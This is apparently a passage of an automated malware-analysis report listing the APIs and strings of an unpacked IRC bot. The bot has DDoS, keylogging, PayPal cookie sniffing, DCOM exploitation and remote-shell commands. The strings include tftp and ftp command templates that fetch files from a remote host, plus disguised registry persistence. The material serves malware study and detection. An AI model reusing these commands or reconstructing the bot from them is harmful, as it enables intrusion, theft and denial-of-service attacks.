</font></pre></td></tr><tr id="sub_40894E"><td><pre><a name="sub_40894E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40894E"><font size=+2>sub_40894E</a>(6f62)</font>:<font color=darkgreen>
	USER32.IsWindow
	USER32.SendMessageA
	USER32.DestroyWindow</font>
<font color=brown>
	"Window"
</font></pre></td></tr><tr id="sub_404197"><td><pre><a name="sub_404197"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404197"><font size=+2>sub_404197</a>(706b)</font>:<font color=darkgreen>
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WSOCK32.recv
	WS2_32.send
	WS2_32.closesocket</font>
<font color=brown>
	"tftp -i %s get %s\r\n"
	"echo open %s %d > o&echo user	1 1 >> o "...
</font></pre></td></tr><tr id="sub_40F6F1"><td><pre><a name="sub_40F6F1"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40F6F1"><font size=+2>sub_40F6F1</a>(761a)</font>:<font color=darkgreen>
	WS2_32.WSAStartup
	WS2_32.gethostbyname
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.connect
	WSOCK32.recv
	WS2_32.send
	WS2_32.closesocket
	WS2_32.WSACleanup
	SHELL32.ShellExecuteA
	WS2_32.getsockname
	WS2_32.inet_ntoa
	WS2_32.inet_addr
	WS2_32.gethostbyaddr
	DNSAPI.DnsFlushResolverCache</font>
<font color=brown>
	" :"
	" "
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"353"
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"SEND"
	"%s has just versioned	me."
	"CHAT"
	"irc.activate"
	"irc.act"
	" :"
	"$%d-"
	"$%d"
	"$me"
	"$user"
	"$chan"
	"$rndnick"
	"$server"
	"$chr("
	"$chr("
	")"
	"63"
	"$chr("
	" "
	" "
	"irc.rndnick"
	"rn"
	"irc.die"
	"irc.di"
	"irc.logout"
	"lo"
	"irc.version"
	"ver"
	"lockdown.on"
	"ld.on"
	"lockdown.off"
	"ld.off"
	"proxy.socks4.on"
	"proxy.s4.on"
	"proxy.socks4.off"
	"Server"
	"Server"
	"proxy.redirect.off"
	"daemon.tftp.off"
	"Server"
	"util.findfile.off"
	"util.ff.off"
	"com.ps.off"
	"clone.off"
	"Clone"
	"Secure"
	"root.stop"
	"Scan"
	"Exploitation"
	"root.stats"
	"root.st"
	"irc.r"
	"irc.disconnect"
	"irc.d"
	"irc.quit"
	"irc.q"
	"irc.status"
	"irc.s"
	"irc.id"
	"irc.i"
	"com.rebewt"
	"threads.list"
	"threads.l"
	"irc.aliases"
	"irc.al"
	"irc.log"
	"irc.lg"
	"util.clg"
	"com.netinfo"
	"com.ni"
	"com.sysinfo"
	"com.si"
	"irc.discordanc33"
	"irc.disco33"
	"com.procs"
	"com.ps"
	"com.harvest"
	"com.key"
	"com.uptime"
	"com.up"
	"com.drv"
	"com.testdlls"
	"com.dll"
	"com.opencmd"
	"com.ocmd"
	"com.ocmd.off"
	"Remote shell"
	"[CMD]"
	"irc.who"
	"-[Login List]-"
	"<Empty>"
	"%d. %s"
	"com.getclip"
	"com.gc"
	"util.farp"
	"util.fdns"
	"root.currentip"
	"root.cip"
	"daemon.httpd.on"
	"daemon.tftp.on"
	"daemon.tf.on"
	"com.findpass"
	"com.fp"
	"root.massexploit"
	"root.mass"
	"irc.nick"
	"irc.n"
	"irc.join"
	"irc.j"
	"irc.part"
	"irc.pt"
	"irc.raw"
	"irc.ra"
	"threads.kill"
	"threads.k"
	"clone.quit"
	"clone.q"
	"clone.rn"
	"irc.prefix"
	"irc.pr"
	"com.open"
	"com.o"
	"irc.setserve"
	"irc.se"
	"irc.dns"
	"irc.dn"
	"com.killprocname"
	"com.kpn"
	"com.prockillid"
	"com.pkid"
	"com.delete"
	"com.del"
	"dcc.get"
	"dcc.gt"
	"com.filelist"
	"com.fl"
	"irc.visit"
	"irc.v"
	"mirc.cmd"
	"mirc.cmd"
	"com.cmd"
	"com.cm"
	"com.readfile"
	"com.rf"
	"psniff"
	"on"
	".n.z.m. (psniff.p.l.g) .��.  Already ru"...
	"##sodoma_3s"
	".n.z.m. (psniff.p.l.g) .��.  Carnivore "...
	".n.z.m. (psniff.p.l.g) .��.  Failed to "...
	"off"
	".n.z.m. (psniff.p.l.g) .��.  Carnivore "...
	".n.z.m. (psniff.p.l.g) .��.  No Carnivo"...
	"sniffer"
	"on"
	".n.z.m. (sniffer.p.l.g) .��. Already ru"...
	"##sodoma_3s"
	".n.z.m. (sniffer.p.l.g) .��. packet sni"...
	".n.z.m. (sniffer.p.l.g) .��. Failed to "...
	"off"
	".n.z.m. (sniffer.p.l.g) .��.	sniffer	s"...
	".n.z.m. (sniffer.p.l.g) .��. No sniffer"...
	"keylog"
	"cmd.kl.on"
	"offz"
	"offz"
	"sys.net"
	"start"
	"stop"
	"pause"
	"continue"
	"delete"
	"share"
	"user"
	"send"
	"com.capture"
	"com.cap"
	"irc.gethost"
	"irc.gh"
	"irc.addalias"
	"irc.aa"
	"irc.privmsg"
	"irc.pm"
	"irc.action"
	"irc.ac"
	"irc.cycle"
	"irc.cy"
	"irc.mode"
	"irc.m"
	"clone.raw"
	"clone.ra"
	"clone.mode"
	"clone.m"
	"clone.nick"
	"clone.ni"
	"clone.join"
	"clone.j"
	"clone.part"
	"clone.p"
	"irc.repeat"
	"irc.rp"
	"irc.delay"
	"irc.de"
	"download.updat4m13"
	"com.execute"
	"com.e"
	"findfile"
	"ff"
	"com.rename"
	"com.mv"
	"ddos.icmp"
	"ddos.ic"
	"clone.make"
	"clone.start"
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
	"ddos.synf"
	"download.wgett4m13"
	"daemon.redirect"
	"daemon.rd"
	"root.ps"
	"clone.pm"
	"clone.action"
	"clone.ac"
	"root.start"
	"root.s"
	"ddos.udpf"
	"u"
	"ddos.pingflood"
	"ddos.pingf"
	"p"
	"ddos.tcpf"
	"util.email"
	" "
	"_"
	"helo $rndnick\nmail from: <%s>\nrcpt to: "...
	"util.httpcon"
	"util.hcon"
	"ftp.upload"
	"%s\\%i%i%i.dll"
	"ab"
	"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
	"-s:%s"
	"ftp.exe"
	"open"
	"syn"
	"ack"
	"random"
	"Spoofed"
	"Normal"
	"ICMP.dll not available"
	"##sodoma_3e"
	"Sequential"
	"[%s]	* %s %s"
	"[%s]	<%s> %s"
	"arra"
	"%s%s.exe"
	"repeat"
	"MODE	%s\r\n"
	"JOIN	%s %s\r\n"
	"screen"
	"drivers"
	"frame"
	"video"
	"Keylog"
	".n.z.m. (keylog.p.l.g) .��."
	".n.z.m. (keylog.p.l.g) .��.  Already ru"...
	"pay"
	"##sodoma_3s"
	".n.z.m. (keylog.p.l.g) .��.  Pay sites "...
	"normal"
	"##sodoma_3s"
	".n.z.m. (keylog.p.l.g) .��.  Normal key"...
	".n.z.m. (keylog.p.l.g) .��.  Failed to "...
	".n.z.m. (keylog.p.l.g) .��.  Unknow mod"...
	"r"
	"\n"
	"open"
	"QUIT :later\r\n"
	"all"
	"JOIN	%s %s\r\n"
	"NICK	%s\r\n"
	"##sodoma_3e"
	"##sodoma_3e"
	"Sequential"
	"full"
	"arra"
	"QUIT	:%s\r\n"
	"QUIT :later\r\n"
	"QUIT :disconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"secure"
	"sec"
	"Unsecuring"
	"NzM Priv Release by Ud2"
	"NICK	%s\r\n"
	"!"
	"~"
	"c0d1am0z3"
	"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
	"NOTICE %s :You've been logged.\r\n"
	"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
	"NOTICE %s :You've been logged.\r\n"
	"c0d1am0z3"
	"USERHOST %s\r\n"
	"-xt+iB"
	"MODE	%s %s\r\n"
	"JOIN	%s %s\r\n"
</font></pre></td></tr><tr id="sub_40967B"><td><pre><a name="sub_40967B"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40967B"><font size=+2>sub_40967B</a>(76b1)</font>:<font color=darkgreen>
	NTDLL.RtlRunDecodeUnicodeString</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B7FD"><td><pre><a name="sub_40B7FD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B7FD"><font size=+2>sub_40B7FD</a>(7918)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_402B92"><td><pre><a name="sub_402B92"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402B92"><font size=+2>sub_402B92</a>(79f8)</font>:<font color=brown>
	"Bot	sniff"
	"##sodoma_3"
	"[PSNIFF]:"
	"PSNIFF//"
	"JOIN	#"
	"302 "
	"366 "
	":.login"
	":!login"
	":!Login"
	":.Login"
	":.ident"
	":!ident"
	":.hashin"
	":!hashin"
</font></pre></td></tr><tr id="sub_4042F8"><td><pre><a name="sub_4042F8"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4042F8"><font size=+2>sub_4042F8</a>(7bee)</font>:<font color=darkgreen>
	WS2_32.ntohs
	WS2_32.send
	WSOCK32.recv</font>
<font color=brown></font></pre></td></tr><tr id="sub_41DD12"><td><pre><a name="sub_41DD12"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41DD12"><font size=+2>sub_41DD12</a>(7e1a)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown>
	"TZ"
</font></pre></td></tr><tr id="sub_40B45B"><td><pre><a name="sub_40B45B"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B45B"><font size=+2>sub_40B45B</a>(8006)</font>:<font color=darkgreen>
	IPHLPAPI.IcmpCreateFile
	WS2_32.inet_addr
	WS2_32.gethostbyname
	IPHLPAPI.IcmpSendEcho
	IPHLPAPI.IcmpCloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_40327E"><td><pre><a name="sub_40327E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40327E"><font size=+2>sub_40327E</a>(8131)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown>
	"arrapato"
	"arrapao"
	"4492"
	"echo open %s %d >> eq&echo user %s %s	>"...
</font></pre></td></tr><tr id="sub_4076D2"><td><pre><a name="sub_4076D2"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4076D2"><font size=+2>sub_4076D2</a>(82b0)</font>:<font color=darkgreen>
	WS2_32.inet_ntoa</font>
<font color=brown>
	"dcom135"
</font></pre></td></tr><tr id="sub_40C86D"><td><pre><a name="sub_40C86D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C86D"><font size=+2>sub_40C86D</a>(8474)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.connect
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_4059D0"><td><pre><a name="sub_4059D0"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4059D0"><font size=+2>sub_4059D0</a>(85c2)</font>:<font color=brown>
	"rb"
</font></pre></td></tr><tr id="sub_4170E6"><td><pre><a name="sub_4170E6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4170E6"><font size=+2>sub_4170E6</a>(8732)</font>:<font color=brown>
	"%s: %s stopped. (%d thread(s)	stopped.)"...
	"%s: No %s thread found."
</font></pre></td></tr><tr id="sub_40E4EB"><td><pre><a name="sub_40E4EB"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E4EB"><font size=+2>sub_40E4EB</a>(893c)</font>:<font color=brown>
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"
</font></pre></td></tr><tr id="sub_40E14E"><td><pre><a name="sub_40E14E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E14E"><font size=+2>sub_40E14E</a>(8cdb)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_40381E"><td><pre><a name="sub_40381E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40381E"><font size=+2>sub_40381E</a>(8edc)</font>:<font color=darkgreen>
	WS2_32.send
	WS2_32.recv</font>
<font color=brown>
	"Dcom135"
</font></pre></td></tr><tr id="sub_403E35"><td><pre><a name="sub_403E35"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_403E35"><font size=+2>sub_403E35</a>(9107)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.inet_addr
	WS2_32.connect
	WS2_32.send
	WSOCK32.recv
	WS2_32.closesocket</font>
<font color=brown>
	"Dcom135"
</font></pre></td></tr><tr id="sub_40AEBE"><td><pre><a name="sub_40AEBE"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AEBE"><font size=+2>sub_40AEBE</a>(920d)</font>:<font color=darkgreen>
	DNSAPI.DnsFlushResolverCache</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AECD"><td><pre><a name="sub_40AECD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AECD"><font size=+2>sub_40AECD</a>(92a8)</font>:<font color=darkgreen>
	IPHLPAPI.GetIpNetTable
	IPHLPAPI.DeleteIpNetEntry</font>
<font color=brown></font></pre></td></tr><tr id="sub_40EA39"><td><pre><a name="sub_40EA39"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40EA39"><font size=+2>sub_40EA39</a>(9bb4)</font>:<font color=brown>
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."
</font></pre></td></tr><tr id="sub_40AB95"><td><pre><a name="sub_40AB95"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AB95"><font size=+2>sub_40AB95</a>(9dbe)</font>:<font color=darkgreen>
	USER32.ExitWindowsEx</font>
<font color=brown>
	"SeShutdownPrivilege"
</font></pre></td></tr><tr id="sub_40F576"><td><pre><a name="sub_40F576"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40F576"><font size=+2>sub_40F576</a>(9e1f)</font>:<font color=darkgreen>
	WS2_32.send
	WS2_32.closesocket
	WSOCK32.recv</font>
<font color=brown>
	"PASS	%s\r\n"
</font></pre></td></tr><tr id="sub_401A6D"><td><pre><a name="sub_401A6D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_401A6D"><font size=+2>sub_401A6D</a>(9e5d)</font>:<font color=darkgreen>
	WS2_32.WSAStartup
	WS2_32.WSASocketA
	WSOCK32.setsockopt
	WS2_32.ntohs
	WS2_32.ntohl
	WS2_32.sendto
	WS2_32.WSAGetLastError
	WS2_32.closesocket
	WS2_32.WSACleanup</font>
<font color=brown></font></pre></td></tr><tr id="sub_401447"><td><pre><a name="sub_401447"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_401447"><font size=+2>sub_401447</a>(9fdc)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.WSAGetLastError
	WSOCK32.setsockopt
	WS2_32.inet_addr
	WS2_32.ntohs
	KERNEL32.GetTickCount
	WS2_32.sendto
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_402368"><td><pre><a name="sub_402368"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402368"><font size=+2>sub_402368</a>(a134)</font>:<font color=darkgreen>
	USER32.GetForegroundWindow
	USER32.GetWindowTextA
	USER32.GetAsyncKeyState
	USER32.GetKeyState</font>
<font color=brown></font></pre></td></tr><tr id="sub_40917E"><td><pre><a name="sub_40917E"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40917E"><font size=+2>sub_40917E</a>(a694)</font>:<font color=darkgreen>
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	NTDLL.ZwQuerySystemInformation
	NTDLL.RtlCreateQueryDebugBuffer
	NTDLL.RtlQueryProcessDebugInformation
	NTDLL.RtlDestroyQueryDebugBuffer</font>
<font color=brown>
	"WINLOGON"
	"NWGINA"
	"MSGINA"
</font></pre></td></tr><tr id="sub_40707C"><td><pre><a name="sub_40707C"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40707C"><font size=+2>sub_40707C</a>(a6b1)</font>:<font color=brown>
	" %s:	%d,"
	" Total: %d in %s."
</font></pre></td></tr><tr id="sub_407635"><td><pre><a name="sub_407635"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_407635"><font size=+2>sub_407635</a>(a6ca)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.ioctlsocket
	WS2_32.connect
	WS2_32.select
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_404D78"><td><pre><a name="sub_404D78"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404D78"><font size=+2>sub_404D78</a>(a900)</font>:<font color=brown>
	"\\\\%s"
	"."
	"\\\\%s\\pipe\\wkssvc"
	"Dcom135"
	"[%s]:	Exploiting IP: %s."
</font></pre></td></tr><tr id="sub_40E8B9"><td><pre><a name="sub_40E8B9"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E8B9"><font size=+2>sub_40E8B9</a>(a909)</font>:<font color=brown>
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."
</font></pre></td></tr><tr id="sub_4022BD"><td><pre><a name="sub_4022BD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4022BD"><font size=+2>sub_4022BD</a>(a9cd)</font>:<font color=brown>
	"e-gold"
</font></pre></td></tr><tr id="sub_401D79"><td><pre><a name="sub_401D79"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_401D79"><font size=+2>sub_401D79</a>(ab64)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount
	WS2_32.socket
	WS2_32.WSAGetLastError
	WSOCK32.setsockopt
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.ntohl
	WS2_32.sendto
	WS2_32.closesocket</font>
<font color=brown>
	"syn"
	"ack"
	"random"
</font></pre></td></tr><tr id="sub_41C4B6"><td><pre><a name="sub_41C4B6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41C4B6"><font size=+2>sub_41C4B6</a>(aba6)</font>:<font color=brown>
	"KERNEL32"
	"IsProcessorFeaturePresent"
</font></pre></td></tr><tr id="sub_40A421"><td><pre><a name="sub_40A421"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40A421"><font size=+2>sub_40A421</a>(ac3c)</font>:<font color=brown>
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"
</font></pre></td></tr><tr id="sub_406979"><td><pre><a name="sub_406979"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_406979"><font size=+2>sub_406979</a>(aed0)</font>:<font color=darkgreen>
	WS2_32.send
	WS2_32.WSAGetLastError</font>
<font color=brown></font></pre></td></tr><tr id="sub_40E220"><td><pre><a name="sub_40E220"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40E220"><font size=+2>sub_40E220</a>(afa1)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_417CAE"><td><pre><a name="sub_417CAE"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_417CAE"><font size=+2>sub_417CAE</a>(b14b)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B865"><td><pre><a name="sub_40B865"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B865"><font size=+2>sub_40B865</a>(b276)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown>
	"PRIVMSG %s	:%s\r"
</font></pre></td></tr><tr id="sub_40D639"><td><pre><a name="sub_40D639"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D639"><font size=+2>sub_40D639</a>(b2db)</font>:<font color=darkgreen>
	KERNEL32.GetDriveTypeA</font>
<font color=brown>
	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"
</font></pre></td></tr><tr id="sub_41D415"><td><pre><a name="sub_41D415"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41D415"><font size=+2>sub_41D415</a>(b3bb)</font>:<font color=brown>
	"<program name	unknown>"
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"
</font></pre></td></tr><tr id="sub_40B5E7"><td><pre><a name="sub_40B5E7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B5E7"><font size=+2>sub_40B5E7</a>(b7d0)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.ntohs
	WS2_32.sendto</font>
<font color=brown></font></pre></td></tr><tr id="sub_402DA6"><td><pre><a name="sub_402DA6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402DA6"><font size=+2>sub_402DA6</a>(b9cf)</font>:<font color=brown>
	"HTTP sniff"
	"##sodoma_3"
	"paypal"
	"PAYPAL"
	"PAYPAL.COM"
	"paypal.com"
	"Set-Cookie:"
</font></pre></td></tr><tr id="sub_41FE42"><td><pre><a name="sub_41FE42"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41FE42"><font size=+2>sub_41FE42</a>(c049)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AAF1"><td><pre><a name="sub_40AAF1"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AAF1"><font size=+2>sub_40AAF1</a>(c0b1)</font>:<font color=darkgreen>
	KERNEL32.SearchPathA
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle</font>
<font color=brown>
	"explorer.exe"
</font></pre></td></tr><tr id="sub_4010B2"><td><pre><a name="sub_4010B2"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4010B2"><font size=+2>sub_4010B2</a>(c40b)</font>:<font color=darkgreen>
	WS2_32.WSAStartup
	WS2_32.WSASocketA
	WSOCK32.setsockopt
	WS2_32.ntohs
	WS2_32.ntohl
	WS2_32.sendto
	WS2_32.WSAGetLastError
	WS2_32.closesocket
	WS2_32.WSACleanup</font>
<font color=brown>
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
</font></pre></td></tr><tr id="sub_40AE95"><td><pre><a name="sub_40AE95"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AE95"><font size=+2>sub_40AE95</a>(c40e)</font>:<font color=darkgreen>
	WS2_32.inet_addr
	WS2_32.gethostbyname</font>
<font color=brown></font></pre></td></tr><tr id="sub_402E92"><td><pre><a name="sub_402E92"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402E92"><font size=+2>sub_402E92</a>(c592)</font>:<font color=darkgreen>
	WS2_32.gethostname
	WS2_32.gethostbyname
	WS2_32.socket
	WS2_32.bind
	WS2_32.WSAGetLastError
	WS2_32.WSAIoctl
	WS2_32.closesocket
	WSOCK32.recv
	WS2_32.ntohs</font>
<font color=brown></font></pre></td></tr><tr id="sub_40DC10"><td><pre><a name="sub_40DC10"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DC10"><font size=+2>sub_40DC10</a>(c7bc)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown>
	"NOTICE"
	"PRIVMSG"
</font></pre></td></tr><tr id="sub_40DBCA"><td><pre><a name="sub_40DBCA"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DBCA"><font size=+2>sub_40DBCA</a>(c85a)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C738"><td><pre><a name="sub_40C738"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C738"><font size=+2>sub_40C738</a>(c8ef)</font>:<font color=darkgreen>
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegDeleteValueA
	ADVAPI32.RegCloseKey</font>
<font color=brown>
	"Windows System Update Tools"
</font></pre></td></tr><tr id="sub_4078E6"><td><pre><a name="sub_4078E6"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_4078E6"><font size=+2>sub_4078E6</a>(ca35)</font>:<font color=darkgreen>
	WS2_32.inet_addr
	KERNEL32.Sleep
	WS2_32.inet_ntoa</font>
<font color=brown></font></pre></td></tr><tr id="sub_40F326"><td><pre><a name="sub_40F326"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40F326"><font size=+2>sub_40F326</a>(ccf3)</font>:<font color=darkgreen>
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.closesocket</font>
<font color=brown>
	"%s\\drivers\\tcpip.sys"
</font></pre></td></tr><tr id="sub_416885"><td><pre><a name="sub_416885"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416885"><font size=+2>sub_416885</a>(ce15)</font>:<font color=darkgreen>
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	KERNEL32.GetDriveTypeA</font>
<font color=brown>
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"
</font></pre></td></tr><tr id="sub_419C82"><td><pre><a name="sub_419C82"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_419C82"><font size=+2>sub_419C82</a>(ce53)</font>:<font color=darkgreen>
	KERNEL32.VirtualFree</font>
<font color=brown></font></pre></td></tr><tr id="sub_402E2D"><td><pre><a name="sub_402E2D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_402E2D"><font size=+2>sub_402E2D</a>(cfb4)</font>:<font color=brown>
	"VULN sniff"
	"##sodoma_3"
	"OpenSSL/0.9.6"
	"Serv-U FTP Server"
	"OpenSSH_2"
</font></pre></td></tr><tr id="sub_408FAC"><td><pre><a name="sub_408FAC"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_408FAC"><font size=+2>sub_408FAC</a>(d3af)</font>:<font color=darkgreen>
	KERNEL32.GetProcAddress
	KERNEL32.GetEnvironmentVariableW</font>
<font color=brown>
	"SeDebugPrivilege"
	"NTDLL.DLL"
	"NtQuerySystemInformation"
	"RtlCreateQueryDebugBuffer"
	"RtlQueryProcessDebugInformation"
	"RtlDestroyQueryDebugBuffer"
	"RtlRunDecodeUnicodeString"
	"SeDebugPrivilege"
